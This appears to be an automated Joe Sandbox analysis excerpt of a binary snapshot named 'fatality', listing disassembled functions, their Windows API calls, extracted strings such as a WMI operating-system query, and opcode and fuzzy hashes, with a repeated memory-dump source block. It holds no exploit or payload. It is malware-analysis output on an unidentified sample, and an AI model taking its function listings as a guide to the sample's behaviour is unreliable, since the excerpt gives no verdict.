                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$Text$ClientItemLongMetricsSystem_strlen_swprintf
                                                                    • String ID: $%s:$CAPTION$d
                                                                    • API String ID: 1208408182-2512411981
                                                                    • Opcode ID: e5b3e0c50cf926806b73f72d5e9d79b76412ef16989cf05a9eedf682be4bfcd2
                                                                    • Instruction ID: 271e34d8069d77863f5e5ef5f52d71bf4a8af3c75d1d5bf01f5c93f5edf6fdb3
                                                                    • Opcode Fuzzy Hash: e5b3e0c50cf926806b73f72d5e9d79b76412ef16989cf05a9eedf682be4bfcd2
                                                                    • Instruction Fuzzy Hash: FB819271108341AFD710DF7ACD89A6FBBE9EBC9704F04091DFA84E7291D671E9098B62
                                                                    Function 00E0CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 00E0CB66
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C71E
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C730
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C742
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C754
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C766
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C778
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C78A
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C79C
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7AE
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7C0
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7D2
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7E4
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7F6
                                                                    • _free.LIBCMT ref: 00E0CB5B
                                                                      • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E08E7A,?,00000004,00000000,?,00E0C007,?,00000004,00000000,?,?,?,00E08716), ref: 00E08DE2
                                                                    • _free.LIBCMT ref: 00E0CB7D
                                                                    • _free.LIBCMT ref: 00E0CB92
                                                                    • _free.LIBCMT ref: 00E0CB9D
                                                                    • _free.LIBCMT ref: 00E0CBBF
                                                                    • _free.LIBCMT ref: 00E0CBD2
                                                                    • _free.LIBCMT ref: 00E0CBE0
                                                                    • _free.LIBCMT ref: 00E0CBEB
                                                                    • _free.LIBCMT ref: 00E0CC23
                                                                    • _free.LIBCMT ref: 00E0CC2A
                                                                    • _free.LIBCMT ref: 00E0CC47
                                                                    • _free.LIBCMT ref: 00E0CC5F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FreeHeap___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 358854727-0
                                                                    • Opcode ID: d0743c263c6d9e1cafc22c8002e428564c7b70e6de5c4e3bc00c93fafcd902b7
                                                                    • Instruction ID: 38d22fd8d5adf826c14ff3332ddb87a9549622a8436ddc911f8ca3bfe7121a49
                                                                    • Opcode Fuzzy Hash: d0743c263c6d9e1cafc22c8002e428564c7b70e6de5c4e3bc00c93fafcd902b7
                                                                    • Instruction Fuzzy Hash: 73314C316002069FEB21AB78D946B5AB7E9EF50314F247A19E599F61D2DE71ACC0CB10
                                                                    Function 00DFD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindow.USER32(?,00000005), ref: 00DFD6C1
                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 00DFD6ED
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00DFD709
                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00DFD720
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00DFD734
                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00DFD75D
                                                                    • DeleteObject.GDI32(00000000), ref: 00DFD764
                                                                    • GetWindow.USER32(00000000,00000002), ref: 00DFD76D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                    • String ID: STATIC
                                                                    • API String ID: 2845197485-1882779555
                                                                    • Opcode ID: becee84a515179373e09f91ad00eee1b6e80555236db68da50f38a9d8ddbbe34
                                                                    • Instruction ID: 2786483a56c030ee5d9ae44b54cc4b9ce4cbe5a5eae14682378c3716dd074357
                                                                    • Opcode Fuzzy Hash: becee84a515179373e09f91ad00eee1b6e80555236db68da50f38a9d8ddbbe34
                                                                    • Instruction Fuzzy Hash: 441136761003187FE221BB749C4AFBF765EEF05701F16C210FB02F6191DA648E0A42B1
                                                                    Function 00E096F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 2929853658-0
                                                                    • Opcode ID: 4eb864aa86226b8a88e804536ae6524db00d3f763b758e0f47388cec99976e86
                                                                    • Instruction ID: 20457c8f4aa7307075a1fd43062a21000d95facd3d3b17a9eaeb7eee054fa829
                                                                    • Opcode Fuzzy Hash: 4eb864aa86226b8a88e804536ae6524db00d3f763b758e0f47388cec99976e86
                                                                    • Instruction Fuzzy Hash: 8411B97612010ABFCB01EF54C942CDD3BB9EF14350B5165A1FA486F1B2DE31DE909B84
                                                                    Function 00E02E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 322700389-393685449
                                                                    • Opcode ID: a56f0e253b67112b867b8e31a11669fa05e212b7249fafa3af5b76b162f59142
                                                                    • Instruction ID: 459ee51aba6c922b43f6c13af0a6a81c11146415351ba1892049cf0f435cbcdf
                                                                    • Opcode Fuzzy Hash: a56f0e253b67112b867b8e31a11669fa05e212b7249fafa3af5b76b162f59142
                                                                    • Instruction Fuzzy Hash: 23B19B31901209EFCF29DFA4C8859AEB7F9FF08314F14615AE9057B292C731DA92CB91
                                                                    Function 00DFB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                      • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                    • EndDialog.USER32(?,00000001), ref: 00DFB610
                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00DFB637
                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00DFB650
                                                                    • SetWindowTextW.USER32(?,?), ref: 00DFB661
                                                                    • GetDlgItem.USER32(?,00000065), ref: 00DFB66A
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00DFB67E
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00DFB694
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                    • String ID: LICENSEDLG
                                                                    • API String ID: 3214253823-2177901306
                                                                    • Opcode ID: ebcf1b9826e8b88b6b6f69c5b3c9c0d99117aed4df5b68f30cf863fdfbf066a3
                                                                    • Instruction ID: 6597e95e67d7c91d5f52f96659d86314d9a4ae1f8200f4f782c31714973a43a4
                                                                    • Opcode Fuzzy Hash: ebcf1b9826e8b88b6b6f69c5b3c9c0d99117aed4df5b68f30cf863fdfbf066a3
                                                                    • Instruction Fuzzy Hash: 8E21D03664020CBFD2215F77EC49E3B7B6DEB4BB90F068015F740FA1A0CB5299069635
                                                                    Function 00DE6FA5 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 329COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE6FAA
                                                                    • _wcslen.LIBCMT ref: 00DE7013
                                                                    • _wcslen.LIBCMT ref: 00DE7084
                                                                      • Part of subcall function 00DEA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00DE977F,?,?,00DE95CF,00000000,00E12641,000000FF), ref: 00DEA1F1
                                                                      • Part of subcall function 00DE9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00DE9E70
                                                                      • Part of subcall function 00DE9620: CloseHandle.KERNELBASE(000000FF,?,?,00DE95D6,00000000,00E12641,000000FF), ref: 00DE963B
                                                                      • Part of subcall function 00DEA4ED: SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,00DEA325,00000001,00DE70E6,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA501
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: File$_wcslen$AttributesCloseDeleteH_prologHandleTime
                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                    • API String ID: 449284102-3508440684
                                                                    • Opcode ID: a5a3528f18a7849032e35fbf347cf78f7a27bfbe86e03be188e5f1896c2b65f0
                                                                    • Instruction ID: 006fef7719c91dcf337c55b82ee26f350cc6778762756edd27e64727bf8d154a
                                                                    • Opcode Fuzzy Hash: a5a3528f18a7849032e35fbf347cf78f7a27bfbe86e03be188e5f1896c2b65f0
                                                                    • Instruction Fuzzy Hash: A8C1C371904785AEDB21FB75DC41FEEB7A8EF08300F04455AFA5AE7182D770AA488B71
                                                                    Function 00DF9711 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 126COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00DF9736
                                                                    • _wcslen.LIBCMT ref: 00DF97D6
                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DF982D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$CreateGlobalStream
                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                    • API String ID: 1938992887-4209811716
                                                                    • Opcode ID: 8d97ccfd87cdde76d5f7ef3763f1f6168a9ecc25902e3454e8e5575b4828b6c8
                                                                    • Instruction ID: d3a8f24468f12e1d770e2b02a12d91439683d4e4d786f02dab31a405cd902656
                                                                    • Opcode Fuzzy Hash: 8d97ccfd87cdde76d5f7ef3763f1f6168a9ecc25902e3454e8e5575b4828b6c8
                                                                    • Instruction Fuzzy Hash: D13139329083057ED725AF30DC06FBBB79CEF42360F15811DF601A61D2EB609A4982B6
                                                                    Function 00DE2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _swprintf.LIBCMT ref: 00DE2536
                                                                      • Part of subcall function 00DF05DA: _wcslen.LIBCMT ref: 00DF05E0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _swprintf_wcslen
                                                                    • String ID: ;%u$x%u$xc%u
                                                                    • API String ID: 2292043294-2277559157
                                                                    • Opcode ID: 97300daa25d2d22295767319b96d5320066f6ccac548e194890b397a9bce4004
                                                                    • Instruction ID: ae7b058cefe3ae519730a6ca3afcf6de1697cf1416ce857fe3dc53d9ac661dca
                                                                    • Opcode Fuzzy Hash: 97300daa25d2d22295767319b96d5320066f6ccac548e194890b397a9bce4004
                                                                    • Instruction Fuzzy Hash: 24F104716043C09BDB25FB2A88D5BFA77D9AB94300F0C456DED8A9B283CB648945C772
                                                                    Function 00DEAF24 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                    • API String ID: 3519838083-3505469590
                                                                    • Opcode ID: 55252f3b4c7fc7f3c4277a4a01c0d424717a1058cff07fa96aa45f4498072a12
                                                                    • Instruction ID: 88dad9ab196483698eabb917c6d9b1ba27c2791ae6653008e0f818d412dfb94a
                                                                    • Opcode Fuzzy Hash: 55252f3b4c7fc7f3c4277a4a01c0d424717a1058cff07fa96aa45f4498072a12
                                                                    • Instruction Fuzzy Hash: 4D716D70A00259AFDB14EFAACC959AFBBB9FF49710B044159F512B72A0CB30BD45CB60
                                                                    Function 00DF9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
